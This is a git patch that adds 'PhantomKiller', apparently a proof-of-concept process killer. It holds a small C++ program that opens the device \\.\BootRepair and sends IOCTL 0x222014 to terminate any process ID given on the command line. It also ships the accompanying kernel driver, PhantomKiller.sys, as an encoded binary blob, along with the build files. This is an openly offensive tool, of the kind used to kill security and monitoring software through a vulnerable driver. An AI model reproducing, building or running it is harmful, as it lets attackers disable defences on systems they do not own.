From 8fdf1403b0e81c4f4a0077344989fbf58a823378 Mon Sep 17 00:00:00 2001
From: j3h4ck <admin@redteamfortress.com>
Date: Tue, 19 May 2026 07:14:40 +0000
Subject: [PATCH] Upload files to "/"

---
 PhantomKiller.cpp     |  25 ++++++++
 PhantomKiller.slnx    |   7 +++
 PhantomKiller.sys     | Bin 0 -> 30320 bytes
 PhantomKiller.vcxproj | 136 ++++++++++++++++++++++++++++++++++++++++++
 README.md             |  56 +++++++++++++++++
 5 files changed, 224 insertions(+)
 create mode 100644 PhantomKiller.cpp
 create mode 100644 PhantomKiller.slnx
 create mode 100644 PhantomKiller.sys
 create mode 100644 PhantomKiller.vcxproj
 create mode 100644 README.md

diff --git a/PhantomKiller.cpp b/PhantomKiller.cpp
new file mode 100644
index 0000000..6bd2868
--- /dev/null
+++ b/PhantomKiller.cpp
@@ -0,0 +1,25 @@
+#include <windows.h>
+#include <stdio.h>
+
+int main(int argc, char* argv[]) {
+    if (argc != 2) {
+        printf("usage: poc.exe <pid>\n");
+        return 1;
+    }
+
+    DWORD pid = atoi(argv[1]);
+    HANDLE h = CreateFileW(L"\\\\.\\BootRepair", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
+    if (h == INVALID_HANDLE_VALUE) {
+        printf("[-] open device failed: %d\n", GetLastError());
+        return 1;
+    }
+
+    DWORD ret;
+    if (DeviceIoControl(h, 0x222014, &pid, sizeof(pid), NULL, 0, &ret, NULL))
+        printf("[+] killed %d\n", pid);
+    else
+        printf("[-] ioctl failed: %d\n", GetLastError());
+
+    CloseHandle(h);
+    return 0;
+}
\ No newline at end of file
diff --git a/PhantomKiller.slnx b/PhantomKiller.slnx
new file mode 100644
index 0000000..79e547d
--- /dev/null
+++ b/PhantomKiller.slnx
@@ -0,0 +1,7 @@
+<Solution>
+  <Configurations>
+    <Platform Name="x64" />
+    <Platform Name="x86" />
+  </Configurations>
+  <Project Path="PhantomKiller/PhantomKiller.vcxproj" Id="6596f834-4a7c-465f-9271-ffca5806403a" />
+</Solution>
diff --git a/PhantomKiller.sys b/PhantomKiller.sys
new file mode 100644
index 0000000000000000000000000000000000000000..cbf308b33fbda9c887776989d057ea0d2a5945ca
GIT binary patch
literal 30320
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
